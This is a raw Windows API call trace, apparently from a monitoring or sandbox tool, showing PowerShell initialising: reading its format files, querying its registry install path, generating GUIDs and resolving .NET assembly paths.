	[0398.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.514] SetErrorMode (uMode=0x1) returned 0x1
	[0398.514] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0398.514] SetErrorMode (uMode=0x1) returned 0x1
	[0398.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0398.515] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0398.515] CoTaskMemAlloc (cb=0x5a) returned 0x49bcd0
	[0398.515] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x49bcd0, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0398.515] CoTaskMemFree (pv=0x49bcd0) 
	[0398.515] RegCloseKey (hKey=0x300) returned 0x0
	[0398.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.851] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x5699aea7, Data2=0xf6e8, Data3=0x4aca, Data4=([0]=0xaa, [1]=0xd, [2]=0x56, [3]=0x5f, [4]=0x3e, [5]=0x71, [6]=0x1a, [7]=0xb0))) returned 0x0
	[0398.865] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd0c37987, Data2=0x3a31, Data3=0x43cc, Data4=([0]=0xaf, [1]=0x53, [2]=0x9c, [3]=0xad, [4]=0xf5, [5]=0x2e, [6]=0x76, [7]=0xb3))) returned 0x0
	[0398.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.867] SetErrorMode (uMode=0x1) returned 0x1
	[0398.867] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0398.867] GetFileType (hFile=0x300) returned 0x1
	[0398.867] SetErrorMode (uMode=0x1) returned 0x1
	[0398.867] GetFileType (hFile=0x300) returned 0x1
	[0398.867] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.868] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.868] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.868] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.868] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.869] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0398.869] ReadFile (in: hFile=0x300, lpBuffer=0x35d9742, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35d9742*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.869] ReadFile (in: hFile=0x300, lpBuffer=0x35da028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da028*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.870] SetErrorMode (uMode=0x1) returned 0x1
	[0398.870] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0398.870] SetErrorMode (uMode=0x1) returned 0x1
	[0398.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.870] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0398.870] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0398.870] CoTaskMemAlloc (cb=0x5a) returned 0x49bcd0
	[0398.870] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x49bcd0, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0398.870] CoTaskMemFree (pv=0x49bcd0) 
	[0398.870] RegCloseKey (hKey=0x300) returned 0x0
	[0398.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0398.872] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x68b8246a, Data2=0x9ed3, Data3=0x482c, Data4=([0]=0x9b, [1]=0x15, [2]=0x73, [3]=0x9a, [4]=0x5b, [5]=0xa, [6]=0xb, [7]=0x56))) returned 0x0
	[0398.876] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe7c8c5da, Data2=0x8b46, Data3=0x4dcd, Data4=([0]=0x97, [1]=0x5c, [2]=0x12, [3]=0x4d, [4]=0xd7, [5]=0x7e, [6]=0xa5, [7]=0x19))) returned 0x0
	[0398.877] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7c51c9f2, Data2=0x4e19, Data3=0x41b9, Data4=([0]=0x83, [1]=0x89, [2]=0xe3, [3]=0x57, [4]=0x6c, [5]=0x7a, [6]=0x44, [7]=0x8a))) returned 0x0
	[0398.878] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe5f186ce, Data2=0x279e, Data3=0x4474, Data4=([0]=0x8c, [1]=0x72, [2]=0x63, [3]=0x31, [4]=0x3b, [5]=0x71, [6]=0x72, [7]=0x56))) returned 0x0
	[0398.879] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x5f076c3c, Data2=0x4bfd, Data3=0x4642, Data4=([0]=0x96, [1]=0x1c, [2]=0x28, [3]=0x7a, [4]=0x43, [5]=0x5, [6]=0x53, [7]=0x78))) returned 0x0
	[0398.879] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x668f4ff1, Data2=0x46f6, Data3=0x40d1, Data4=([0]=0xb5, [1]=0x1a, [2]=0xad, [3]=0x36, [4]=0xc4, [5]=0xf5, [6]=0xb5, [7]=0x90))) returned 0x0
	[0398.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.880] SetErrorMode (uMode=0x1) returned 0x1
	[0398.880] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0398.880] GetFileType (hFile=0x300) returned 0x1
	[0398.880] SetErrorMode (uMode=0x1) returned 0x1
	[0398.880] GetFileType (hFile=0x300) returned 0x1
	[0398.881] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.881] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.881] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0xaca, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x36253ba, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36253ba*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.882] ReadFile (in: hFile=0x300, lpBuffer=0x3625d88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3625d88*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0398.883] CloseHandle (hObject=0x300) returned 1
	[0398.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.883] SetErrorMode (uMode=0x1) returned 0x1
	[0398.883] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0398.883] SetErrorMode (uMode=0x1) returned 0x1
	[0398.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.883] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0398.883] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0398.883] CoTaskMemAlloc (cb=0x5a) returned 0x49bcd0
	[0398.883] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x49bcd0, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0398.883] CoTaskMemFree (pv=0x49bcd0) 
	[0398.884] RegCloseKey (hKey=0x300) returned 0x0
	[0398.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0398.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0398.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0399.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0399.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0399.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0399.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0399.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0399.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0399.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0399.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0399.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0399.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0399.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0399.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0399.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0399.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
